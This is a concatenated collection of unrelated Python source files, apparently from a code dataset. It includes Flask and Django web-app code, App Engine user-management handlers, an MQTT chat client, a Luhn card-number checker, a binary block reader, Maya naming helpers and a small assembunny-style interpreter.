            'postal_code': form.postal_code.data,
            'country': form.country.data
        }
        return redirect(url_for('evaluation.new', **address_data))
    return render_template('landing/index.html', form=form)
@bp.route('/about', methods=['GET'])
def about():
    """Render the static About page."""
    return render_template('landing/about.html')
@bp.route('/contact', methods=['GET'])
def contact():
    """Render the static Contact page."""
    return render_template('landing/contact.html')
@bp.route('/privacy', methods=['GET'])
def privacy():
    """Render the static Privacy page."""
    return render_template('landing/privacy.html')
@bp.route('/services', methods=['GET', 'POST'])
def services():
    """Render the Services page (accepts POST but performs no processing)."""
    return render_template('landing/services.html')
@bp.route('/terms', methods=['GET'])
def terms():
    """Render the static Terms page."""
    return render_template('landing/terms.html')
@bp.route('/pricing', methods=['GET', 'POST'])
def pricing():
    """Pricing page with the same address form/redirect flow as the index.

    NOTE(review): duplicates the form handling in index(); consider a shared
    helper if this grows further.
    """
    form = LandingAddressForm()
    if form.validate_on_submit():
        # forward the normalized address components to the evaluation flow
        address_data = {
            'line_1': form.street_number.data + " " + form.route.data,
            'city': form.locality.data,
            'state_code': form.administrative_area_level_1.data,
            'postal_code': form.postal_code.data,
            'country': form.country.data
        }
        return redirect(url_for('evaluation.new', **address_data))
    return render_template('landing/pricing.html', form=form)
|
# Generated by Django 4.0 on 2021-12-18 20:19
from django.db import migrations, models
class Migration(migrations.Migration):
    # Initial migration: creates the Event table.
    # Applied migrations must not be modified; any schema change needs a
    # follow-up migration.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Event',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('event_cod', models.CharField(max_length=200, unique=True, verbose_name='Codigo Identificacion')),
                ('event_nom', models.CharField(max_length=200, verbose_name='Nombre del Evento')),
                ('event_date_init', models.DateField(blank=True, null=True, verbose_name='Fecha de Inicio')),
                # NOTE(review): 'even_date_end' looks like a typo for
                # 'event_date_end'; renaming requires a new migration.
                ('even_date_end', models.DateField(blank=True, null=True, verbose_name='Fecha de Finalizacion')),
                ('event_site', models.TextField(blank=True, max_length=500, null=True, verbose_name='Lugar del Evento')),
                ('event_url', models.URLField(blank=True, null=True, verbose_name='Pagina Web')),
            ],
        ),
    ]
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
#
import main
import json
import logging
import os
import urllib
import webapp2
from google.appengine.api import users
from google.appengine.ext.webapp import template
from google.appengine.ext import blobstore
from google.appengine.ext.webapp import blobstore_handlers
from google.appengine.ext import db
class UserDB(db.Model):
    """Datastore record describing an application user and their access."""
    # NOTE(review): the first positional argument of a db Property is its
    # verbose name, so these u'' / '' values set empty verbose names —
    # confirm this was intentional rather than a misplaced default.
    userName = db.StringProperty(u'')
    userEMail = db.StringProperty(u'')
    userId = db.StringProperty(u'')
    userLevel = db.StringProperty(u'')       # role: e.g. 'Admin'/'Edit'/'View' (see manageUsers)
    privileges = db.ListProperty(str, default=[])
    lastUpdate = db.DateTimeProperty(auto_now=True, auto_now_add=True)
    defaultDB = db.StringProperty(u'')
    comment = db.StringProperty('')
    affiliation = db.StringProperty('')
# Return info based on current user.
def getUserInfo(login_target='/', logout_target='/'):
    """Return a tuple describing the current App Engine user.

    Returns (user, nickname, logout_url, login_url, is_admin); the
    user-specific entries are None when nobody is signed in.

    Note: logout_target is accepted but the logout URL is always built
    for '/' (original behavior preserved).
    """
    current_user = users.get_current_user()
    user_login = users.create_login_url(login_target)
    user_nickname = None
    user_logout = None
    isAdmin = None
    if current_user:
        user_nickname = current_user.nickname()
        user_logout = users.create_logout_url('/')
        # Signed-in users get a login URL pointing at the words page.
        user_login = users.create_login_url('/words/getWords/')
        isAdmin = users.is_current_user_admin()
    # logging.info('%s, %s, %s, %s' % (current_user, user_nickname, user_logout, user_login))
    return (current_user, user_nickname, user_logout, user_login, isAdmin)
class manageUsers(webapp2.RequestHandler):
    """Render the user-administration page (users.html) listing every
    UserDB entity together with the assignable roles."""
    def get(self):
        # (user, nickname, logout_url, login_url, is_admin)
        user_info = getUserInfo(self.request.url)
        q = UserDB.all()
        userCount = 0
        userList = []
        roleList = ['Admin', 'Edit', 'View']
        # Materialize all users for the template (userCount is tallied but
        # not passed to the template).
        for p in q.run():
            userCount += 1
            userList.append(p)
        template_values = {
            'language': main.Language,
            'roleList': roleList,
            'userList': userList,
            'userInfo': user_info,
            'user_nickname': user_info[1],
            'user_logout': user_info[2],
            'user_login_url': user_info[3],
        }
        path = os.path.join(os.path.dirname(__file__), 'users.html')
        self.response.out.write(template.render(path, template_values))
class addUser(webapp2.RequestHandler):
    """Create a UserDB entity from query parameters (userEmail, role,
    privileges, userName) unless that e-mail is already registered."""
    def get(self):
        newUserEmail = self.request.get('userEmail', None)
        userRole = self.request.get('role', None)
        privileges = self.request.GET.getall('privileges')
        userName = self.request.get('userName', None)
        # Echo the received parameters back for debugging.
        self.response.out.write('\nArguments = %s' % self.request.arguments())
        self.response.out.write('\nEMail = %s' % newUserEmail)
        self.response.out.write('\nuserName = %s' % userName)
        self.response.out.write('\nprivileges = %s' % privileges)
        q = UserDB.all()
        q.filter('userEMail =', newUserEmail)
        p = q.get()  # First entity with this e-mail, or None.
        if p:
            self.response.out.write('\n!!!: User %s already in database: %s\n' % (
                p, p.userLevel))
        else:
            newUser = UserDB(userEMail=newUserEmail,
                             userName=userName,
                             userLevel=userRole,
                             privileges=privileges,)
            newUser.put()
            self.response.out.write('\n!!!: Added User %s (%s) in role %s' % (
                newUser.userName, newUser.userEMail, newUser.userLevel))
class deleteUser(webapp2.RequestHandler):
    """Delete the UserDB entities whose e-mails appear in the 'userDelete'
    query parameters, but only when 'confirmDelete' is set."""
    def get(self):
        userEMails = self.request.GET.getall('userDelete')
        logging.info('Emails to delete: %s' % userEMails)
        confirm = self.request.get('confirmDelete', None)
        if not confirm:
            # Bug fix: the handler previously reported the missing
            # confirmation but fell through and deleted the users anyway.
            self.response.out.write('\n!!!: Delete not confirmed!')
            return
        numDeleted = 0
        for email in userEMails:
            q = UserDB.all()
            q.filter('userEMail =', email)
            self.response.out.write('\n!!!: email = %s\n' % (email))
            p = q.get()  # First entity with this e-mail, or None.
            self.response.out.write('\n!!!: p=: %s)\n' % (p))
            if p is not None:
                self.response.out.write('\n!!!: User %s to be deleted from database: %s \n' % (p.userName, p.userEMail))
                UserDB.delete(p)
                numDeleted += 1
            else:
                self.response.out.write('\n!!!: No such email in database: %s\n' % (
                    email))
        self.response.out.write('\n!!!: %d users were deleted from database\n' % (numDeleted))
class clearUsers(webapp2.RequestHandler):
    """Remove every UserDB entity from the datastore."""
    def get(self):
        numDeleted = 0
        # Iterate all user entities and delete them one at a time.
        for entity in UserDB.all().run():
            UserDB.delete(entity)
            numDeleted += 1
        self.response.out.write('\n%d users deleted' % numDeleted)
|
# Generated by Django 3.0.4 on 2021-01-12 10:48
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds the 'sampling_technique' choice field to the recipe model.
    # Applied migrations must not be edited after deployment.
    dependencies = [
        ('scout', '0004_auto_20200417_1034'),
    ]
    operations = [
        migrations.AddField(
            model_name='recipe',
            name='sampling_technique',
            field=models.CharField(choices=[('top', 'Top'), ('random', 'Random'), ('stratified', 'Stratified')], default='top', max_length=64),
        ),
    ]
|
######################################
# File Name : mqtt_message
#
# Author : Thomas Kost, some edits by Nico
#
# Date: October 24, 2020
#
# Brief : file generalizing sending and receiving of MQTT messages
#
######################################
import json
import paho.mqtt.client as mqtt
import time
import datetime
import queue
class MQTTLink:
    """Two-way MQTT chat link over a single topic (the "board").

    Uses one paho-mqtt client for publishing (tx) and one for subscribing
    (rx). Outgoing messages accumulate in self.messages and are published
    as one JSON payload by send(); incoming payloads are parsed in
    __on_message and handed to receiveMessage(), which prints new
    messages, applies acknowledgements, and queues acks of its own.
    """
    # MQTT client functions
    def __on_connect_subscriber(self, client, userdata, flags, rc):
        # Subscribing in on_connect() means that if we lose the connection and
        # reconnect then subscriptions will be renewed.
        client.subscribe(self.board, qos=1)
    def __on_disconnect_subscriber(self, client, userdata, rc):
        # rc != 0 signals a disconnect we did not request.
        if rc != 0:
            print('Unexpected Disconnect')
        else:
            print('Expected Disconnect')
    def __on_connect_publisher(self, client, userdata, flags, rc):
        print("Connection returned result: "+str(rc))
    def __on_disconnect_publisher(self, client, userdata, rc):
        if rc != 0:
            print('Unexpected Disconnect')
        else:
            print('Expected Disconnect')
    def __on_message(self, client, userdata, message):
        #filter data to get only json
        #parse message
        # NOTE(review): str(payload)[2:-1] strips the b'...' wrapper of the
        # bytes repr; message.payload.decode() is the conventional approach
        # and this form breaks on non-ASCII payloads — confirm payloads are
        # always ASCII JSON before changing.
        cur = json.loads(str(message.payload)[2:-1])
        # do not receive our own messages
        if not (cur["senderID"]==self.user):
            self.receiveMessage(cur)
    def __init__(self, board, user, color = "white", emoji = "/smileyface"):
        """board: MQTT topic name; user: unique sender ID;
        color/emoji: display attributes advertised with every payload."""
        self.tx = mqtt.Client()
        self.rx = mqtt.Client()
        self.board = board
        # Outgoing payload template: "messages" holds not-yet-acknowledged
        # messages, "acks" holds the IDs this side acknowledges to peers.
        self.messages = {"acks":[],
                         "messages":[],
                         "senderID": user,
                         "senderColor": color,
                         "senderEmojiImage":emoji
                         }
        self.count = 0  # running counter used to build unique message IDs
        self.user = user
        # per-sender list of message IDs already seen (de-duplication)
        self.last_recieved = {}
        # per-sender display attributes learned from received payloads
        self.network = {}
        #configure client
        # configure transmission
        self.tx.on_connect = self.__on_connect_publisher
        self.tx.on_disconnect = self.__on_disconnect_publisher
        # configure reception
        self.rx.on_connect = self.__on_connect_subscriber
        self.rx.on_disconnect = self.__on_disconnect_subscriber
        self.rx.on_message = self.__on_message
        self.tx.connect_async('mqtt.eclipseprojects.io')
        self.rx.connect_async('mqtt.eclipseprojects.io')
        self.listen_called = False
    def __del__(self):
        # Stop the background listener (if started) and drop both connections.
        if self.listen_called:
            self.rx.loop_stop()
        self.tx.disconnect()
        self.rx.disconnect()
    def __addMessage(self, message_content):
        # Queue an outgoing message and bump the ID counter.
        self.messages["messages"].append(message_content)
        self.count +=1
    def __add_ack(self,ID):
        # Record an ID to acknowledge, avoiding duplicates.
        if not (ID in self.messages["acks"]):
            self.messages["acks"].append(ID)
    def __recieve_ack(self, ID):
        # A peer acknowledged ID: drop that message from the resend queue.
        for message in self.messages["messages"]:
            if ID == message["ID"]:
                self.messages["messages"].remove(message)
    def receiveMessage(self, message):
        """Process one decoded payload: print new messages addressed to us,
        apply received acks, queue acks for what we saw, and record the
        seen message IDs for de-duplication."""
        # note: there can be multiple messages )in the stack recieved
        form_message = ''
        if message["senderID"] not in self.last_recieved:
            # First contact with this sender: remember display attributes.
            self.last_recieved[message["senderID"]]= []
            self.network[message["senderID"]] = {
                "color":message["senderColor"],
                "emojiID": message["senderEmojiImage"]
            }
        for msg in message["messages"]:
            # Show only messages addressed to us (or broadcast) and not seen before.
            if (msg["reciever"] == self.user or msg["reciever"] == "all") and (msg["ID"] not in self.last_recieved[message["senderID"]]):
                form_message += msg['sender'] + " said: " + msg['data'] + '\n'
        # recieve acks
        for ack in message["acks"]:
            self.__recieve_ack(ack)
        # add any new acks
        for msg in message["messages"]:
            self.__add_ack(msg["ID"])
        # we can change the contents of form message if another format is more desirable
        if form_message :
            print(form_message)
        # record message IDs
        IDs = []
        for msg in message["messages"]:
            IDs.append(msg["ID"])
        self.last_recieved[message["senderID"]] = IDs
    def addText(self, text, reciever):
        """Queue a text message addressed to 'reciever' ("all" = broadcast)."""
        now = datetime.datetime.now()
        ID = self.board + '_' + self.user + '_' + str(self.count)
        msg = {
            "message_type" : "text",
            "sender" : self.user,
            "reciever" : reciever,
            "data" : text,
            "time" : {
                "hour":now.hour,
                "minute": now.minute,
                "second": now.second
            },
            "ID" : ID
        }
        self.__addMessage(msg)
    def addGesture(self, gesture, reciever):
        """Queue a gesture message addressed to 'reciever'."""
        now = datetime.datetime.now()
        ID = self.board + '_' + self.user + '_' + str(self.count)
        # NOTE(review): "gesutre" looks like a typo for "gesture"; both ends
        # of the protocol use this exact string, so renaming it changes the
        # wire format — coordinate with all peers before fixing.
        msg = {
            "message_type" : "gesutre",
            "sender" : self.user,
            "reciever" : reciever,
            "data" : gesture,
            "time" : {
                "hour":now.hour,
                "minute": now.minute,
                "second": now.second
            },
            "ID" : ID
        }
        self.__addMessage(msg)
    def send(self):
        """Publish the accumulated payload (messages + acks) to the board."""
        self.tx.loop_start()
        # just toss it all out there
        self.tx.publish(self.board, json.dumps(self.messages), qos=1)
        self.tx.loop_stop()
    def listen(self, duration= -1):
        """Start receiving: duration -1 listens in the background until the
        object is deleted; otherwise listen for 'duration' seconds."""
        #only listen if a reciever is initiated
        if duration == -1:
            self.rx.loop_start() # changed from loop forever so nonblocking thread
            self.listen_called = True
        else:
            self.rx.loop_start()
            time.sleep(duration)
            self.rx.loop_stop()
    #network getter functions
    def get_Color(self, user):
        #getter function to return color for a given user ("white" if unknown)
        if user in self.network:
            return self.network[user]["color"]
        else:
            return "white"
    def get_Emoji_Tag(self,user):
        # getter function to return emoji for a given user (default if unknown)
        if user in self.network:
            return self.network[user]["emojiID"]
        else:
            return "/smileyface"
from cs50 import get_string
from sys import exit
# Function for checking digits (Luhn checksum)
def checkDigits(number):
    """Return True when the digit string *number* passes the Luhn check.

    Fixes: the original iterated over the module-level global
    ``countDigits`` instead of ``len(number)``, so it only worked when the
    global happened to match the argument. The digit-sum of the doubled
    digit is computed inline (2*d <= 18, so it is d2 // 10 + d2 % 10),
    removing the dependency on module state entirely.
    """
    revNumber = number[::-1]
    total = 0
    for i in range(len(number)):
        currentDigit = int(revNumber[i])
        # Double every second digit (counting from the right) and add the
        # sum of its digits; add the other digits unchanged.
        if i % 2 == 1:
            doubled = 2 * currentDigit
            total += doubled // 10 + doubled % 10
        else:
            total += currentDigit
    return total % 10 == 0
# Utility function for summing digits
def sumDigits(number):
    """Return the sum of the decimal digits in the string *number*."""
    return sum(int(ch) for ch in number)
# Get input from user
cardNum = get_string("Number: ")
countDigits = len(cardNum)
# Initial check for valid number: the shortest supported card is 13 digits.
if countDigits < 13:
    print("INVALID")
    exit(0)
firstDigit = int(cardNum[0])
secondDigit = int(cardNum[1])
# Initial validation: classify the issuer by length and leading digits.
# AMEX: 15 digits starting 34/37; MasterCard: 16 digits starting 51-55;
# Visa: 13 or 16 digits starting 4.
if countDigits == 15 and firstDigit == 3 and secondDigit in [4, 7]:
    cardType = "AMEX"
elif countDigits == 16 and firstDigit == 5 and secondDigit > 0 and secondDigit < 6:
    cardType = "MASTERCARD"
elif countDigits in [13, 16] and firstDigit == 4:
    cardType = "VISA"
else:
    print("INVALID")
    exit(0)
# The Luhn checksum decides final validity.
if checkDigits(cardNum):
    print(cardType)
else:
    print("INVALID")
    exit(0)
|
from biomaj2galaxy.config import get_instance
# Module-level Galaxy instance shared by the test package.
gi = get_instance('local')
def setup_package():
    """Package-level test setup hook (nose-style).

    Declares ``gi`` global; nothing is rebound here, so this currently
    acts only as a placeholder.
    """
    global gi
|
#!/usr/bin/env python3
#
# Copyright 2014 Simone Campagna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__author__ = "Simone Campagna"
__all__ = [
'filelist',
'multiopen',
'BlockReader',
]
import numpy as np
import contextlib
import os
from ..errors import RubikError
from ..units import Memory
from ..shape import Shape
from ..py23 import BASE_STRING
from .dtypes import get_dtype
def filelist(filenames):
    """Normalize *filenames* to a tuple of names.

    Accepts a single string or a list/tuple of strings; raises TypeError
    for anything else.
    """
    if isinstance(filenames, BASE_STRING):
        filenames = (filenames, )
    elif isinstance(filenames, (list, tuple)):
        filenames = tuple(filenames)
    else:
        # Bug fix: the message previously referenced the undefined name
        # 'filename', raising NameError instead of the intended TypeError.
        raise TypeError("invalid filename value {!r} of type {}: it must be str, tuple or list".format(filenames, type(filenames).__name__))
    return filenames
@contextlib.contextmanager
def multiopen(filenames, mode):
    """Context manager yielding a tuple of file handles, one per filename.

    Fixes two resource leaks in the original: handles were not closed when
    the consumer raised inside the 'with' body (no try/finally around the
    yield), and already-opened handles leaked when a later open() failed.
    """
    filenames = filelist(filenames)
    filehandles = []
    try:
        for filename in filenames:
            filehandles.append(open(filename, mode))
        yield tuple(filehandles)
    finally:
        for filehandle in filehandles:
            filehandle.close()
class BlockReader(object):
    """BlockReader(...)
    A BlockReader object allows to read blocks from a list of files

    The same number of items is read from each file on every step, so the
    block tuples yielded by read() stay aligned across files.
    """
    DEFAULT_BLOCK_SIZE = Memory('1gb')
    def __init__(self, count, dtype=None, buffer_size=None, max_memory=None):
        """count: items per file (int, Shape, or a shape string/tuple);
        dtype: item dtype, resolved through get_dtype();
        buffer_size: optional per-read buffer size (Memory-compatible);
        max_memory: optional total memory cap (Memory-compatible)."""
        if isinstance(count, Shape):
            count = count.count()
        if isinstance(count, (BASE_STRING, tuple)):
            count = Shape(count).count()
        self.count = count
        dtype = get_dtype(dtype)
        self.dtype = dtype
        # size in bytes of a single item
        self.itemsize_b = dtype().itemsize
        if buffer_size is not None:
            buffer_size = Memory(buffer_size)
        self.buffer_size = buffer_size
        if max_memory is not None:
            max_memory = Memory(max_memory)
        self.max_memory = max_memory
        # expected size in bytes of every input file
        self.filesize_b = self.count * self.itemsize_b
    def check_files(self, filenames):
        """self.check_files(filenames) -> raise an exception if some file does
        not exists or has wrong size"""
        for filename in filenames:
            if not os.path.exists(filename):
                raise RubikError("file {} does not exists".format(filename))
            filesize_b = os.stat(filename).st_size
            if filesize_b != self.filesize_b:
                if filesize_b < self.filesize_b:
                    status = "short"
                else:
                    status = "long"
                raise RubikError("file {f}: too {s}: it contains {ci}/{cb} items/bytes, expected {ei}/{eb}".format(
                    f=filename,
                    s=status,
                    ci=filesize_b // self.itemsize_b,
                    cb=filesize_b,
                    ei=self.filesize_b // self.itemsize_b,
                    eb=self.filesize_b))
    def read(self, filenames):
        """self.read(filenames) -> iterates over read blocks
        reads and yields blocks from filenames"""
        filenames = filelist(filenames)
        self.check_files(filenames)
        if not filenames:
            return
        # Choose how many items to read per step so that the buffers for
        # all files together respect the configured memory limits.
        if self.max_memory is None:
            max_memory_b = self.count * self.itemsize_b * len(filenames)
        else:
            max_memory_b = self.max_memory.get_bytes()
        if self.buffer_size is None:
            buffer_size = self.DEFAULT_BLOCK_SIZE.get_bytes()
        else:
            buffer_size = self.buffer_size.get_bytes()
        max_buffer_size = min(max_memory_b // len(filenames), buffer_size)
        block_count = max(1, max_buffer_size // self.itemsize_b)
        expected_count = self.count
        read_count = 0
        with multiopen(filenames, 'rb') as filehandles:
            while read_count < expected_count:
                blocks = []
                step_count = min(expected_count - read_count, block_count)
                if step_count == 0:
                    break
                for filename, filehandle in zip(filenames, filehandles):
                    block = np.fromfile(filehandle, dtype=self.dtype, count=step_count)
                    # Bug fix: the original had a second, unreachable
                    # 'elif block.size < step_count' branch duplicating this
                    # condition; np.fromfile never returns more than 'count'
                    # items, so the short-read check alone is sufficient.
                    if block.size < step_count:
                        raise RubikError("file {}: too short, read {} items, expected {}".format(
                            filename, read_count + block.size, expected_count))
                    blocks.append(block)
                yield tuple(blocks)
                read_count += step_count
            # Any trailing byte means a file is longer than declared.
            for filename, filehandle in zip(filenames, filehandles):
                if filehandle.read(1):
                    raise RubikError("file {}: too long, read {} items, expected {}".format(
                        filename, read_count + 1, expected_count))
    def reduce(self, filenames, function, *n_args, **p_args):
        """self.reduce(filenames, function, *n_args, **p_args) -> reduce result
        executes reduce 'function' on all the blocks read from 'filenames'.
        'function' is a function expecting a tuple of blocks as first arguments,
        and *n_args, *p_args as following optional arguments.

        Note: 'function' is called once per block tuple and only the last
        return value is kept, so a true reduction must carry its own state.
        """
        result = None
        for blocks in self.read(filenames):
            result = function(blocks, *n_args, **p_args)
        return result
|
"""
read_sides extracts the sides from strings provided.
proper nomenclature of using sides in Maya is _l_ or l_, _L_, L_, left_ or _left, Left_, and _Left.
Each class supports iteration and __getitem__ extraction.
"""
# import standard modules
import json
import os
import re
# define local variables
sides_file = os.path.join(os.path.dirname(__file__), "sides.json")
re_any_upper = re.compile('[A-Z]+')
def read_file():
    """
    reads the sides json file.
    """
    with open(sides_file, 'r') as handle:
        data = json.load(handle)
    return data
def strip_underscore(in_string="", strip=False):
    """
    if true, strips any leading/trailing underscores from the parameter.
    :param in_string: <str> check this string for any underscores.
    :param strip: <bool> if true, strip '_' from the string.
    :return: <str> resultant string name.
    """
    return in_string.strip("_") if strip else in_string
def extract_side_from_string(s_dict=None, in_string="", index=False, with_underscore=True):
    """
    extract the side from the string provided.
    :param s_dict: <dict> dictionary of side tokens to search for
                   (default: empty; fixed from a shared mutable default).
    :param in_string: <str> input string.
    :param index: <bool> also return the index where the side was found.
    :param with_underscore: <bool> return the side with its underscore(s).
    :return: <str> side, or (side, index) tuple when index is True.
    """
    # Bug fix: the original used a mutable default argument (s_dict={}),
    # which is shared between calls; use None as the sentinel instead.
    if s_dict is None:
        s_dict = {}
    s_string = ""
    s_index = -1
    # Later matches overwrite earlier ones, so the infix form ('_k_') takes
    # precedence over suffix ('_k'), which takes precedence over prefix ('k_').
    for k in s_dict:
        side_name = '{}_'.format(k)
        if in_string.startswith(side_name):
            s_string = side_name
            s_index = extract_side_index_from_string(in_string, s_string, start=True)
        side_name = '_{}'.format(k)
        if in_string.endswith(side_name):
            s_string = side_name
            s_index = extract_side_index_from_string(in_string, s_string, end=True)
        side_name = '_{}_'.format(k)
        if side_name in in_string:
            s_string = side_name
            s_index = extract_side_index_from_string(in_string, s_string)
    if index:
        return strip_underscore(s_string, not with_underscore), s_index
    else:
        return strip_underscore(s_string, not with_underscore)
def extract_side_index_from_string(in_string="", side="", start=False, end=False):
    """
    find the index of the side token inside the string provided.
    :param in_string: <str> the string to check.
    :param side: <str> the side token to locate.
    :param start: <bool> anchor the search at the start of the string.
    :param end: <bool> anchor the search at the end of the string.
    :return: <int> index of the match (callers check the anchored forms
             only after startswith/endswith, so a match is expected).
    """
    if start:
        match = re.search('^{}'.format(side), in_string)
        return match.start()
    if end:
        match = re.search('{}$'.format(side), in_string)
        return match.end()
    return in_string.find(side)
class Sides(object):
    """Lookup and iteration helper over the "sides" mapping of sides.json.

    Each side key (e.g. 'l', 'left', 'L') is exposed as an attribute on
    the instance via update_class().
    """
    KEY = "sides"   # key of sides.json this class reads
    SIDES = {}      # populated from sides.json in __init__
    START = 0       # iteration cursor (Python 2 iterator protocol)
    LENGTH = 0      # number of entries in SIDES
    def __init__(self):
        self.SIDES = read_file()[self.KEY]
        self.LENGTH = len(self.SIDES)
        self.update_class()
    def update_class(self):
        """
        updates the current class with keys and values
        """
        for k, v in self.SIDES.items():
            self.__dict__[k] = v
    def side_from_string(self, in_string=""):
        """
        get the side from string collected.
        :param in_string: <str> search for a side string name from this parameter.
        :return: <str> the side string name.
        """
        return extract_side_from_string(self.SIDES, in_string)
    def side_name_from_string(self, in_string=""):
        """
        get a uniform, title-cased side name from an incoming string object.
        :param in_string: <str> check this string for a side name.
        :return: <str> side name from string.
        """
        side_name = extract_side_from_string(self.SIDES, in_string, with_underscore=False)
        # Single-letter sides are expanded via the mapping before titling.
        if len(side_name) == 1:
            return self.SIDES[side_name].title()
        return side_name.title()
    def split(self):
        """
        finds if there is an _ in the sides dictionary.
        :return: <tuple> array of names with '_'.
        """
        return tuple(filter(lambda x: '_' in x, self.SIDES))
    def sides(self):
        """
        get all the side keys in sides.json dictionary.
        :return: <tuple> array of side names.
        """
        return tuple(self.SIDES)
    def items(self):
        """
        array of side names.
        :return: <list> array of side names with their corresponding letter/ letters.
        """
        return self.SIDES.items()
    def upper(self):
        """
        return any name with upper case letters.
        :return: <tuple> upper case letter names.
        """
        return tuple(filter(lambda x: re_any_upper.search(x), self.SIDES))
    def lower(self):
        """
        return any name with lower case letters.
        :return: <tuple> lower case letter names.
        """
        return tuple(filter(lambda x: x.islower(), self.SIDES))
    def upper_singles(self):
        """
        return any name with upper case single letters.
        :return: <tuple> upper case single letter names.
        """
        return tuple(filter(lambda x: len(x) == 1, self.upper()))
    def lower_singles(self):
        """
        return any name with lower case single letters.
        :return: <tuple> lower case single letter names.
        """
        return tuple(filter(lambda x: len(x) == 1, self.lower()))
    def lower_names(self):
        """
        return any lower case names.
        :return: <tuple> lower case names.
        """
        return tuple(filter(lambda x: len(x) != 1, self.lower()))
    def upper_names(self):
        """
        return any upper case names.
        :return: <tuple> upper case names.
        """
        return tuple(filter(lambda x: len(x) != 1, self.upper()))
    def __getitem__(self, item):
        # Attribute-style lookup: sides['l'] -> mapped value.
        return self.__dict__[item]
    def __repr__(self):
        return str(self.SIDES)
    def __iter__(self):
        # NOTE(review): returns self without resetting START, so each
        # instance can only be iterated once — confirm intent.
        return self
    def next(self):
        # Python 2 iterator protocol (no __next__ alias is defined).
        # NOTE(review): self.SIDES.keys()[num] only works on Python 2;
        # dict views are not indexable on Python 3 — confirm the target
        # interpreter before reuse.
        num = self.START
        self.START += 1
        if num < self.LENGTH:
            return self.SIDES[self.SIDES.keys()[num]]
        else:
            raise StopIteration("[Sides] :: Max length reached.")
class Axes(Sides):
    """Iteration helper over the "axes" array of sides.json."""
    KEY = "axes"
    # For this subclass SIDES holds a JSON array (list), not a dict.
    SIDES = []
    def __init__(self):
        super(Axes, self).__init__()
    def update_class(self):
        # Expose each axis name as an attribute; no mapped value exists.
        for k in self.SIDES:
            self.__dict__[k] = None
    def next(self):
        # Python 2 iterator protocol; yields each axis name in order.
        num = self.START
        self.START += 1
        if num < self.LENGTH:
            return self.SIDES[num]
        else:
            raise StopIteration("[Axes] :: Max length reached.")
class MirrorSides(Sides):
    """Lookup of mirror sides (e.g. left <-> right) from the "mirror"
    mapping of sides.json."""
    KEY = "mirror"
    def __init__(self):
        super(MirrorSides, self).__init__()
    def side_from_string(self, in_string="", index=False):
        """
        get the sides from a string value provided.
        :param in_string: <str> input string to extract sides from.
        :param index: <bool> if true, also return the position where the side string was found.
        :return: <str> the side string value.
        """
        return extract_side_from_string(self.SIDES, in_string, index=index)
    def replace_side_string(self, in_string=""):
        """
        replaces the side with the mirror side strings.
        :param in_string: <str> input string.
        :return: <str> output string with the replaced side string, or the
                 input unchanged when no known side is found.
        """
        side, index = self.side_from_string(in_string=in_string, index=True)
        stripped_side_name = side.strip('_')
        # see if there is a side to check first.
        if stripped_side_name in self.__dict__:
            # Build the mirrored token, keeping the surrounding underscores.
            mirror_side_name = side.replace(stripped_side_name, self[stripped_side_name])
            # Partition around the first occurrence and swap it in place.
            split_str = list(in_string.partition(side))
            if split_str.count(side):
                split_index = split_str.index(side)
                split_str[split_index] = split_str[split_index].replace(side, mirror_side_name)
                return ''.join(split_str)
        return in_string
|
#!/usr/bin/env python
import sys
def load_program(filename):
    """Read the program file as a list of tokenized instruction lines."""
    with open(filename, 'rb') as f:
        return [line.strip().split() for line in f]
def execute(prog, pc, registers):
    # Execute the single instruction at pc; return the next program counter.
    # Python 2 source (print statements); instructions are assembunny-style:
    # cpy x y, inc x, dec x, jnz x y.
    cmd = prog[pc]
    print 'Executing', cmd
    inst = cmd[0]
    if inst == 'cpy':
        # cpy x y: copy register or integer literal x into register y.
        x = cmd[1]
        if x in registers:
            registers[cmd[2]] = registers[x]
        else:
            registers[cmd[2]] = int(x)
    elif inst == 'inc':
        registers[cmd[1]] = registers[cmd[1]] + 1
    elif inst == 'dec':
        registers[cmd[1]] = registers[cmd[1]] - 1
    elif inst == 'jnz':
        # jnz x y: jump by offset y when register/literal x is non-zero.
        x = cmd[1]
        if x in registers:
            if registers[x]:
                return pc + int(cmd[2])
        elif int(x):
            return pc + int(cmd[2])
    # Default: fall through to the next instruction.
    return pc + 1
def main(argv=None):
    # Load the program named on the command line and run it until the
    # program counter falls off the end; registers a-d start at zero.
    if not argv:
        argv = sys.argv
    prog = load_program(argv[1])
    print prog
    registers = {'a':0, 'b':0, 'c':0, 'd':0}
    pc = 0
    while pc < len(prog):
        pc = execute(prog, pc, registers)
    print registers
if __name__ == '__main__':
    main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.